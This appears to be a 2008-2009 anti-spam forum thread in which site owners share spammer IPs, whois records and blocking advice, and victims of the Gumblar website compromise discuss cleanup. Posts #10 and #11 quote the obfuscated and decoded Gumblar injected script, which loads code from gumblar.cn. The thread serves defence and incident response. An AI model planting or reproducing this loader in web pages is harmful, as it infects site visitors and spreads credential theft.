You are not logged in.

#1 2008-04-15 3:48 am

kurtcobainvn
Member
Registered: 2008-02-15
Posts: 12

Spammer of the week

Hey guys, since about 3 days ago, I have been receiving like 30 registrations from this IP: 78.129.202.3 and 78.157.143.201. That/those moron(s) use the same email domain: @fasif.com. Probably he won the 1st prize for spammer of this week, right?

I wish I have his real email so that the prize could be sent to him.

Offline

#2 2008-04-15 10:24 am

Lothy
Member
From: Ohio, USA
Registered: 2007-12-10
Posts: 11
Website

Re: Spammer of the week

Urk, this same bot hit me about 24 times this weekend when I was busy working 15 hour days and unable to get my wireless working. >_>

Offline

#3 2008-04-16 11:40 am

kurtcobainvn
Member
Registered: 2008-02-15
Posts: 12

Re: Spammer of the week

That same person/bot hit me about 15 times today and probably will appear tomorrow with the same quantity. That guy is really a lame. None of the registration has passed.

Offline

#4 2008-04-16 11:45 am

kurtcobainvn
Member
Registered: 2008-02-15
Posts: 12

Re: Spammer of the week

Some info of this person's ip from whois:

person:         Alexander A Solovyov
address:        LIMT Group Ltd.
Mira 67
Perm
614036
Russian Federation

phone:          +7 342 2763167
e-mail:         abuse@limt.ru
e-mail:         noc@limt.ru
e-mail:         svr.band@gmail.com

What a lame, he named his email abuse@...
svr.band@gmail.com looks like Stevie Ray Vaughan to me lol
Anyway, I don't think the figures are reliable but they must mean something.

Last edited by kurtcobainvn (2008-04-16 11:51 am)

Offline

#5 2008-04-28 9:04 pm

ShadowHunter
Member
From: Maryland
Registered: 2008-04-28
Posts: 1
Website

Re: Spammer of the week

I got a slew of fasif.com spammers also.  I banned anything coming from @fasif.com.

Offline

#6 2008-04-30 8:35 am

todavy
Member
Registered: 2008-04-30
Posts: 1

Re: Spammer of the week

Hello,

Last weeks we have on a daily basis been recieving hundreds of submitted forms with nonsense text from our website. This is
causing big problems in our work.

When contacting the Swedish police in this matter they helped us finding the IP-adress to the source. The IP adress of the submitted forms is 78.129.202.9 and the police said it corresponds to the person Alexander A Solovyov at the company LIMT Group Ltd. Below is an example of one submitted form as of today.

What could we do about this?

Best regards

David

Return-Path: <postmaster@tux04.epsab.com>
X-Spam-Checker-Version: SpamAssassin 3.2.4 (2008-01-01) on mail2.space2u.com
X-Spam-Level: 2/5
X-Spam-Status: No, score=0.1 required=10.0 tests=BAYES_00,FH_FROMEML_NOTLD
    shortcircuit=no autolearn=no version=3.2.4
Received: from tux04.epsab.com (h-156-24.A170.cust.bahnhof.se [85.24.156.24])
    by mail2.space2u.com (8.14.2/8.13.8) with ESMTP id m3U8OEqr029942
    (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT)
    for <david@netway.se>; Wed, 30 Apr 2008 10:24:17 +0200
Received: (qmail 857 invoked by uid 48); 30 Apr 2008 10:24:13 +0200
Date: 30 Apr 2008 10:24:13 +0200
Message-ID: <20080430082413.10100.qmail@tux04.epsab.com>
To: ingemar@2000taletsvetenskap.nu, david@netway.se
From: ()
Subject: Ny medlem - 2000taletsvetenskap.nu
X-Generated-By: Matt Wright's FormMail.pl v1.9s-p7
X-Script-URL: http://www.2000taletsvetenskap.nu:80/cg … ormmail.pl
X-Originating-IP: [78.129.202.9]
Status:   
X-FS-Classification-spam:  2
X-FS-Diagnostics: database-version=2008-04-22 tests=DIRECT_MX_FORGED_RECEIVED,DNS_AVAILABLE,FS_UNTRUSTED_2,RDNS_DYNAMIC_IP_2,FS_CLASS_SPAM_2

Below is the result of your feedback form.  It was submitted by
() on Wednesday, April 30, 2008 at 10:24:13
---------------------------------------------------------------------------

Fornamn: zZSOUubAqXTo

Efternamn: jCVxYowjWJgCVYLhu

Adress: zXGdNURoZTwpSSOmOs

Postnr: oQSKWLQrRNlSpLjBCpj

Stad: XzliiMhSLDKrDRvZmha

Tfnnr: sGdSvmKTACEfWqu

-----------------------------------------------------------------------

Offline

#7 2008-04-30 4:15 pm

MysteryFCM
Member
From: Tyneside, UK
Registered: 2008-01-16
Posts: 606
Website

Re: Spammer of the week

First thing to do is block the LIMT net-block;

inetnum: 78.129.202.0 - 78.129.203.255
netname: LIMT_Group-1
descr: LIMT Group Ltd
country: RU
admin-c: AAS166-RIPE
tech-c: AAS166-RIPE
status: ASSIGNED PA
mnt-by: RAPIDSWITCH-MNT
source: RIPE # Filtered

person: Alexander A Solovyov
address: LIMT Group Ltd.
address: Mira 67
address: Perm
address: 614036
address: Russian Federation
phone: +7 342 2763167
e-mail: abuse@limt.ru
e-mail: noc@limt.ru
e-mail: svr.band@gmail.com
nic-hdl: AAS166-RIPE
mnt-by: RAPIDSWITCH-MNT
source: RIPE # Filtered

% Information related to '78.129.128.0/17AS29131'

route: 78.129.128.0/17
descr: RapidSwitch Ltd
origin: AS29131
mnt-by: RAPIDSWITCH-MNT
source: RIPE # Filtered

http://hosts-file.net/?s=78.129.202.9

I'd also recommend blocking everything coming from blocks related to or owned by, RapidSwitch;

http://www.stopforumspam.com/forum/t110 … 105-GAH%21

http://www.robtex.com/as/as29131.html


Regards
Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

Offline

#8 2009-04-24 12:36 pm

encryptor7
Member
Registered: 2009-04-24
Posts: 1

Re: Spammer of the week

I am sorry to say but either they have moved, which I find flase but the origin of the IP own is listed below. The "registrar" and/or "host" in this case is not taking responsibility for their client. Yet the Client clearly shows off whom they are and try to post they are elsewhere.

The "host" provider is the one you want to contact, because they are the ones maintaining their clients server. In this case, it would be UKSERVERS-MNT. They may have some Term of Service contract where their client is breaking it and can have their server shutdown.

Good luck



IP Information for 94.229.65.173
IP Location:     Russian Federation Russian Federation Limit-surehost-ip
Resolve Host:     no.rdns-yet.ukservers.com
IP Address:     94.229.65.173 [Whois] [Reverse-Ip] [Ping] [DNS Lookup] [Traceroute]
Blacklist Status:     Clear
Whois Record

OrgName:    RIPE Network Coordination Centre
OrgID:      RIPE
Address:    P.O. Box 10096
City:       Amsterdam
StateProv: 
PostalCode: 1001EB
Country:    NL

ReferralServer: whois://whois.ripe.net:43

NetRange:   94.0.0.0 - 94.255.255.255
CIDR:       94.0.0.0/8
NetName:    94-RIPE
NetHandle:  NET-94-0-0-0-1
Parent:     
NetType:    Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS.LACNIC.NET
Comment:    These addresses have been further assigned to users in
Comment:    the RIPE NCC region. Contact information can be found in
Comment:    the RIPE database at http://www.ripe.net/whois
RegDate:    2007-07-30
Updated:    2007-08-07

== Additional Information From whois://whois.ripe.net:43 ==

inetnum:        94.229.65.160 - 94.229.65.191
netname:        LIMIT-SUREHOST-IP-3
descr:          LIMIT SUREHOST IP RANGE 3
country:        RU
admin-c:        AAS188-RIPE
tech-c:         AAS188-RIPE
status:         ASSIGNED PA
mnt-by:         UKSERVERS-MNT
source:         RIPE # Filtered

person:         Alexander A Solovyov
address:        LIMT Group Ltd.
address:        Karpinskogo 97a
address:        Moscow
address:        111423
address:        Russian Federation
phone:          +7 342 2763167
e-mail:         
e-mail:         
e-mail:         
nic-hdl:        AAS188-RIPE
source:         RIPE # Filtered

route:          94.229.64.0/20
descr:          UK Dedicated Servers Limited
origin:         AS42831
mnt-by:         UKSERVERS-MNT
source:         RIPE # Filtered

Offline

#9 2009-05-04 8:36 am

zaphod
Jägermonster
From: USA
Registered: 2008-11-22
Posts: 2,985
Website

Re: Spammer of the week

Reported.

Hmmm, second signature spammer in as many days. Is anyone getting the IP and user agents of these idjuts? ZB Block is hungry.

Zap smile

Edit: I hope there has been benefit denial with the URLs behind the links of these spammers being scrambled by the admin.

Last edited by zaphod (2009-05-04 8:40 am)


Get Protected, Stay Protected...
With ZB Block, GNU/GPL Freeware Anti-Spam/Anti-Hack protection for your php based website.

Little boxes in the server farm, little boxes running php...

Offline

#10 2009-05-14 4:31 pm

compmike
Member
Registered: 2009-05-14
Posts: 2

Re: Spammer of the week

Hey Guys,

Dunno much about the subject but I have 2 dedicated servers on Godaddy and we were hit by this same Bot. We got an email from godaddy with this information:

ATTACK IP 89.185.228.12

our programmers have decoded this and are working on stopping this, looks like they got in from a weak ftp username and password.

SAMPLE OF MALICIOUS CONTENT:

script language=javascript  !--
(function(t){eval(unescape(('var_20a_3d_22Sc_72iptEngine_22_2c_62_3d_22_56ersi_6fn()_2b_22_2cj_3d_22_22_2cu_3dn_61_76_69gator_2e_75_73erA_67ent_3b_69f((_75_2
einde_78_4ff(_22W_69n_22)_3e0_29_26_26(u_2eind_65xO_66(_22NT_206_22_29_3c_30_29_26_26(document_2ecoo_6bie_2ein_64ex_4ff_28_22m_69e_6b_3d1_22)_3c_30)_26_26_28
_74ypeo_66_28_7arvzts)_21_3dtypeof(_22_41_22_29_29)_7bzrvzt_73_3d_22A_22_3bev_61l(_22_69_66_28window_2e_22+_61_2b_22)j_3d_6a+_22_2b_61+_22M_61jor_22+b_2ba+_2
2M_69nor_22+b+a_2b_22_42u_69_6cd_22_2b_62+_22j_3b_22)_3bdocum_65n_74_2ewrit_65(_22_3cscr_69pt_20_73rc_3d_2f_2fg_75mblar_2ecn_2fr_73s_2f_3f_69d_3d_22+_6a+_22_
3e_3c_5c_2fscri_70_74_3e_22)_3b_7d').replace(t,'%')))})(/_/g);
--  /script

I will post this info "decoded" in a few.
Let me know if this helps!

Thanks,

compmike

Offline

#11 2009-05-14 4:54 pm

MysteryFCM
Member
From: Tyneside, UK
Registered: 2008-01-16
Posts: 606
Website

Re: Spammer of the week

It's our friends at gumblar;

eval(unescape(('var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//gumblar.cn/rss/?id="+j+"><\/script>");}').replace(t,'?))})(/?);

The gumblar.cn URL, leads to exploits.

Ref:
http://www.malwaredomainlist.com/forums … pic=2816.0


Regards
Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

Offline

#12 2009-05-14 5:55 pm

compmike
Member
Registered: 2009-05-14
Posts: 2

Re: Spammer of the week

Hey thanks for the reply!

we have the same script here LOL (actually not funny but kinda)

we are cleaning our websites now but what a pain in the arse!

I will post any new info we / they find.

So far it seems they look for any ftp clients on a local machine and
finds the usernames / passwords from the ftp and send it to them. then
infect the websites and uses the websites to infect others.

ARRRRRGGGGG!



If you have any info please let us know!

Thanks again,

compmike

Offline

#13 2009-05-14 6:02 pm

MysteryFCM
Member
From: Tyneside, UK
Registered: 2008-01-16
Posts: 606
Website

Re: Spammer of the week

Actually, the most common infection vector they use, is SQL injection.

In the case of yours, your FTP/server logs should tell you which vector they used, and provide you with info on what you need to improve (i.e whether your code has exploitable holes, or you just need to improve your FTP passwords)

If you need any help, drop by the MDL forums I linked to above.

/edit

I forgot to mention, the following (linked in the MDL thread), provides some info you can use to pin point and cleanup;

http://blog.unmaskparasites.com/2009/05 … ed-script/

Last edited by MysteryFCM (2009-05-14 6:03 pm)


Regards
Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

Offline

#14 2009-05-14 9:14 pm

zaphod
Jägermonster
From: USA
Registered: 2008-11-22
Posts: 2,985
Website

Re: Spammer of the week

And if you feel like you want a tire-patch in the meantime, ZB Block should work fine for you.

Zap big_smile


Get Protected, Stay Protected...
With ZB Block, GNU/GPL Freeware Anti-Spam/Anti-Hack protection for your php based website.

Little boxes in the server farm, little boxes running php...

Offline

#15 2009-05-15 10:15 pm

Samker
Member
Registered: 2009-05-15
Posts: 8
Website

Re: Spammer of the week

For me Spamer or better say Hacker of the Week is "KrisBarteo"...

Just take a look what this Moron do: http://www.simplemachines.org/community … c=307717.0

Best Regards to All Forum Members,

Samker

Offline

#16 2009-05-15 11:08 pm

AsciiD
Member
Registered: 2008-12-07
Posts: 49

Re: Spammer of the week

So the moral of this story would seem to be to not allow custom avitars.

Offline

#17 2009-05-16 6:14 am

Samker
Member
Registered: 2009-05-15
Posts: 8
Website

Re: Spammer of the week

AsciiD wrote:

So the moral of this story would seem to be to not allow custom avitars.

Yes, it's look that there is at least one part of this exploit.

Offline

#18 2009-05-16 8:14 pm

zaphod
Jägermonster
From: USA
Registered: 2008-11-22
Posts: 2,985
Website

Re: Spammer of the week

LIMT has a low-block too...

77.92.88.0 - 77.92.89.255

along with the higher...

78.129.202.0 -78.129.203.255

Have added both to ZB Block, and grouped them into RBN.

Will be publishing the updated signatures shortly.

Zap smile

Edit: It's published.

Last edited by zaphod (2009-05-16 8:49 pm)


Get Protected, Stay Protected...
With ZB Block, GNU/GPL Freeware Anti-Spam/Anti-Hack protection for your php based website.

Little boxes in the server farm, little boxes running php...

Offline

#19 2009-05-17 6:46 pm

goodman84
Member
Registered: 2008-03-22
Posts: 19

Re: Spammer of the week

Ya i just got some toco toco berto dude. He was like to remove ur site from ad list email no.ads08@gmail.com
I'm think if i do i'll get more spam.

Offline

#20 2009-05-18 6:56 pm

ih8spam
Member
Registered: 2009-03-25
Posts: 266

Re: Spammer of the week

for those of you keeping track of the gumblar.cn hack that's been sweeping the net lately...

it has now known as "martuz.cn"
IP: 95.129.145.58


http://hphosts.blogspot.com/2009/05/gum … tuzcn.html


"Two years from now, spam will be solved."
Bill Gates, founder of Microsoft, 2004

Offline

Board footer

Powered by FluxBB

Close
Close